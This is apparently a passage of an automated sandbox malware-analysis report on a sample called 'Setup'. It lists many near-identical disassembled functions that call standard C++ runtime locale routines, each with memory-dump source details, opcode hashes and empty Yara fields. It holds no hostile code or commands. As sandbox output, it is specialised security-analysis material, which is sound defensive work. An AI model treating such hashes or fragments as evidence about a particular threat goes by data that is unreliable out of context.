                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61770
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6177A
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D617CB
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D617EB
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D617F8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 37e68311f6d57c2f6baeb3aeea3b727baa68b0dc06cc5ce739548e93bac73224
                                                                                                                                                                                                                                                      • Instruction ID: 0118a91f20266c1cfe3f7e1505044234c27e255a8fd794f3378a9d9e362d6190
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37e68311f6d57c2f6baeb3aeea3b727baa68b0dc06cc5ce739548e93bac73224
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1801AD31900265CBCF05EBA8C9586FEB7AAEF94324F25411AE81867390CF75DE05CBA5
                                                                                                                                                                                                                                                      Function 02D6147E Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61485
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6148F
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D614E0
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61500
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6150D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 804398b03e12a0bd796a447e550a1c8dd02561147155cacf005e8532159e193b
                                                                                                                                                                                                                                                      • Instruction ID: c731fbbe3f184e40b3c1f47486a9fe5c4e35d73062744b0303d170273b2e3d4b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 804398b03e12a0bd796a447e550a1c8dd02561147155cacf005e8532159e193b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1201AD319001298BCF05EBA8D954ABDB7B6EF84314F24451AE81967390CFB4DE05CFA5
                                                                                                                                                                                                                                                      Function 02D615A8 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D615AF
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D615B9
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6160A
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6162A
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D61637
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 98f7f921751a3fa6cd3b5dd8abab2d56fa6d955cd07a05b3119b5d89abd43b57
                                                                                                                                                                                                                                                      • Instruction ID: 4f2876892f5a42ffdb7db21e5729e81362113f64eb74a3cd3906432ea851d517
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98f7f921751a3fa6cd3b5dd8abab2d56fa6d955cd07a05b3119b5d89abd43b57
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA0104359001658BCF04EBA8C904ABDB7B6EF94310F24051AD80967390CF75DE01CFA5
                                                                                                                                                                                                                                                      Function 02D61513 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6151A
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D61524
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D61575
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61595
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D615A2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 0f9b3098ba0abb1f302c3e30f2f7053481ab468a763fa86ef2b6939a19c5afce
                                                                                                                                                                                                                                                      • Instruction ID: 829c25536cab610f865236261a03d7b061a5862163175ea7d27f4172d0192415
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f9b3098ba0abb1f302c3e30f2f7053481ab468a763fa86ef2b6939a19c5afce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 430100319001658BCF04EBA8C9586FEB7B2EF94320F24441AE81A6B390CF74DE01CFA5
                                                                                                                                                                                                                                                      Function 02D6CA71 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CA78
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CA82
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CAD3
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CAF3
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CB00
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 639d1d645853516698945927b33989c09dae6e9180eac5537ae4362a97d3cb4f
                                                                                                                                                                                                                                                      • Instruction ID: cdabe58086a192705980716cef922cf2d940ded33037cbd1140e5add86c8a45d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 639d1d645853516698945927b33989c09dae6e9180eac5537ae4362a97d3cb4f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E80122319001668BCF04EBA8C9186BEB7B2EF88310F25411EE81567390CFB59E01CFE5
                                                                                                                                                                                                                                                      Function 02D60BC3 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60BCA
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60BD4
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D60C25
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60C45
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D60C52
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 0738cdd6fba0820bcb5a3a780152cc918a7f3494287506520769711e61079fdb
                                                                                                                                                                                                                                                      • Instruction ID: ea1b14edb5046ee54c02842b8d81eda04626109b9b6a1210a7750f9dcdd7cb41
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0738cdd6fba0820bcb5a3a780152cc918a7f3494287506520769711e61079fdb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27010031900125CBCF09EBA4C9546BDB7B6FF84315F25411AE815AB380CF759E05CFA5
                                                                                                                                                                                                                                                      Function 02D6CB9B Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CBA2
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CBAC
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CBFD
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CC1D
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CC2A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 8343ed92cb4aef7ac189aca32d12298d97e0ad3b05bfa153ade5190a798e4b4b
                                                                                                                                                                                                                                                      • Instruction ID: 72159d4557181683ca5b605249abcb800ef43f5ae688f76be03808d48e847327
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8343ed92cb4aef7ac189aca32d12298d97e0ad3b05bfa153ade5190a798e4b4b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 390122319101298BCF04EBA8C9186BDB7B3EF94314F25401EE80967390CF799E05CFA5
                                                                                                                                                                                                                                                      Function 02D60B2E Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60B35
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60B3F
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D60B90
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60BB0
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D60BBD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 29b1f465f0d6b36a5eacdf906a2532ca53482e7993baf44fc19236f203bab5fc
                                                                                                                                                                                                                                                      • Instruction ID: eaf26213c95166cc55ce9567b536e5adf44e153cd67766f37c9805ec2ffed403
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29b1f465f0d6b36a5eacdf906a2532ca53482e7993baf44fc19236f203bab5fc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA01003190012ACBCF04EBA8C9046FEB7A6FF84315F24455AE8166B390DF749E02CFA5
                                                                                                                                                                                                                                                      Function 02D61893 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6189A
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D618A4
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D618F5
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61915
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D61922
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 4aaa0c0f37d954dc2845ab0b8ff5143bf824a4f50e11b3f36bbf45816ea4a65d
                                                                                                                                                                                                                                                      • Instruction ID: b76913e0371efcce72fc44ae5a9da579f666827f265cb96630241acd4523c7f1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aaa0c0f37d954dc2845ab0b8ff5143bf824a4f50e11b3f36bbf45816ea4a65d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F40122319001299BCF04EB68C9586BEB7B6EF84314F24411AE81867390CF75DE05CFA5
                                                                                                                                                                                                                                                      Function 02D61928 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6192F
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D61939
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6198A
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D619AA
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D619B7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 08b0ea23e7e6d866aadf172a7b739f1a641a5e306b328bb99c0fade05440d404
                                                                                                                                                                                                                                                      • Instruction ID: b170404201fcd56e8c7f6636a44c4c9e007e39da185c9754443bf22aa34cf70f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08b0ea23e7e6d866aadf172a7b739f1a641a5e306b328bb99c0fade05440d404
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01AD319001298BCF05EB68C9546FEB7A6EF94324F25451AE81867390CF75DE05CFA5
                                                                                                                                                                                                                                                      Function 02D6CE84 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CE8B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CE95
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CEE6
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CF06
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CF13
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 6af1f5f9da23b7e1cd9a268b081a6a925a14e43f6530b0c14dc6b34023f60ff1
                                                                                                                                                                                                                                                      • Instruction ID: 056b8b39e24b1e3d7c6eef18c124d4c3795b90ce812dc0eea6d43874e5047a50
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6af1f5f9da23b7e1cd9a268b081a6a925a14e43f6530b0c14dc6b34023f60ff1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 800122319001258FCF04EBA4C9186BDB7B2EF84314F24051AE815AB3C0CF749E05CFA9
                                                                                                                                                                                                                                                      Function 02D60CED Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60CF4
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60CFE
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D60D4F
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60D6F
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D60D7C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 3ff3b43df0f9d77caeec8f88d706d4a4377a2003f8e7ddfca59d75eac732c99c
                                                                                                                                                                                                                                                      • Instruction ID: 9aad6d26fc884ce992a13204f10763d30a028bd3e4cb4144c4b7f7e2f201d3df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ff3b43df0f9d77caeec8f88d706d4a4377a2003f8e7ddfca59d75eac732c99c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 590100319001258FCF04EB68C9546FEBBB6EF84310F24451AE80467390CF75AE02CFA5
                                                                                                                                                                                                                                                      Function 02D60C58 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60C5F
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60C69
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D60CBA
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60CDA
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D60CE7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 0c5663da46332026660ece363f6c8b8e80b96402850bb17a066416aad4c4d3ce
                                                                                                                                                                                                                                                      • Instruction ID: 2dd35fc1ee28f476db01acb7e7ed5b4404b0a6dc99b533c16a9f3b0c1b7a01d1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c5663da46332026660ece363f6c8b8e80b96402850bb17a066416aad4c4d3ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29010031900125CBCF04EB64C9486BDB7A6FF84310F25461AE9156B3C0DF749E09CFA5
                                                                                                                                                                                                                                                      Function 02D6CC30 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CC37
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CC41
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CC92
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CCB2
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CCBF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
